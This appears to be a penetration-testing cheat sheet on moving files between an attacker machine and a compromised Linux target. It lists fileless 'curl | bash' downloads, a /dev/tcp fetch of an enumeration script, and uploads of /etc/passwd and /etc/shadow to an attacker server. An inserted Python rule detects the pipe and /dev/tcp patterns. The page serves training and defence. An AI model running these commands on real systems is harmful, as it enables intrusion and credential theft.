# Linux Target

## Download Operations (Attacker -> Target)

### Base64 Encoding and Decoding

If you have access to a terminal on the target, you can paste the base64-encoded file contents into it and decode them there.

### Web Downloads with Wget and cURL

```bash
wget <URL> -O <PATH_OUTPUT>
```

```bash
curl -o <PATH_OUTPUT> <URL>
```

### Fileless

Because of the way Linux works and how [pipes operate](https://www.geeksforgeeks.org/piping-in-unix-or-linux/), most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

{% hint style="info" %}
Some payloads such as `mkfifo` write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.
{% endhint %}

**Fileless Download with cURL or Wget**

```bash
curl <URL> | bash
```

```bash
wget -qO- <URL> | python3
```

### Download with Bash (/dev/tcp)

There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with `--enable-net-redirections`), the built-in `/dev/tcp` device file can be used for simple file downloads.

```bash
exec 3<>/dev/tcp/10.10.10.32/80
```

```bash
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

```bash
cat <&3
```
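
From the defender's side, the pipe-to-interpreter and `/dev/tcp` techniques above leave no downloaded file to scan, so detection has to key on the command text itself. The following Python is an added example, not part of the original page; it assumes telemetry that records the full shell command string (shell history or a `sh -c` argument), and the function names, labels and sample commands are constructed for illustration.

```python
import re

# Downloader output piped straight into an interpreter, e.g. `curl <URL> | bash`.
# `\b` after the interpreter name keeps tools like `sha256sum` from matching `sh`.
PIPE_TO_INTERPRETER = re.compile(
    r"\b(curl|wget)\b[^|;\n]*\|\s*(?:sudo\s+)?(?:\S*/)?"
    r"(bash|dash|zsh|sh|python[\d.]*|perl|ruby|php)\b"
)

# Bash network redirection: only counts when /dev/tcp or /dev/udp is the target
# of a redirection operator, not when the path is merely mentioned as an argument.
DEV_TCP = re.compile(r"[<>]\s*/dev/(tcp|udp)/([^/\s]+)/(\d+)")


def classify(command):
    """Return a list of findings for one recorded shell command string."""
    findings = []
    m = PIPE_TO_INTERPRETER.search(command)
    if m:
        findings.append(f"pipe-to-interpreter:{m.group(1)}->{m.group(2)}")
    m = DEV_TCP.search(command)
    if m:
        findings.append(f"dev-tcp:{m.group(1)}:{m.group(2)}:{m.group(3)}")
    return findings


# Constructed sample telemetry (documentation addresses and example.test only).
SAMPLE_COMMANDS = [
    "curl https://example.test/install.sh | bash",
    "wget -qO- http://192.0.2.10/job.py | python3",
    "exec 3<>/dev/tcp/192.0.2.10/80",
    "curl -sL https://example.test/pkg.tgz | sha256sum",   # benign: hashing
    "curl -o /tmp/pkg.tgz https://example.test/pkg.tgz",   # benign: plain download
    "grep -r /dev/tcp /etc/profile.d",                     # benign: path as argument
]


def scan(commands):
    """Map each flagged command to its findings; unflagged commands are omitted."""
    results = {}
    for command in commands:
        findings = classify(command)
        if findings:
            results[command] = findings
    return results


if __name__ == "__main__":
    for command, findings in scan(SAMPLE_COMMANDS).items():
        print(f"{findings} <- {command}")
```

Because `/dev/tcp` is handled inside Bash and a pipeline runs as separate processes, neither pattern appears in per-process `execve` arguments alone; the rule only works on sources that keep the whole command line as typed.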

### SSH Downloads

On the Attacker machine, install and/or enable SSH:

```bash
sudo systemctl enable ssh
```

```bash
sudo systemctl start ssh
```

On the Target machine:

```bash
scp plaintext@192.168.49.128:/root/myroot.txt .
```

{% hint style="info" %}
You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.
{% endhint %}

***

## Upload Operations (Target -> Attacker)

### Web Upload

The method is the same as on Windows: install an HTTP server that allows uploads:

```bash
sudo python3 -m pip install --user uploadserver
```

We can add a self-signed certificate to it:

```bash
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
```

(The web server should not host the certificate. We recommend creating a new directory to host the file for our web server.)

```bash
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

Finally, let's upload multiple files in one request. From the Target machine, run:

```bash
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

We used the option `--insecure` because we used a self-signed certificate that we trust.

### Alternative Web File Transfer Method

Since Linux distributions usually have `Python` or `php` installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we download the files from our Pwnbox.

```bash
python3 -m http.server
```

```bash
python2.7 -m SimpleHTTPServer
```

```bash
php -S 0.0.0.0:8000
```

```bash
ruby -run -ehttpd . -p8000
```

Then download the file normally from the Attacker machine.

### SCP Upload

```bash
scp /etc/passwd <username>@<IP>:/home/kali/
```
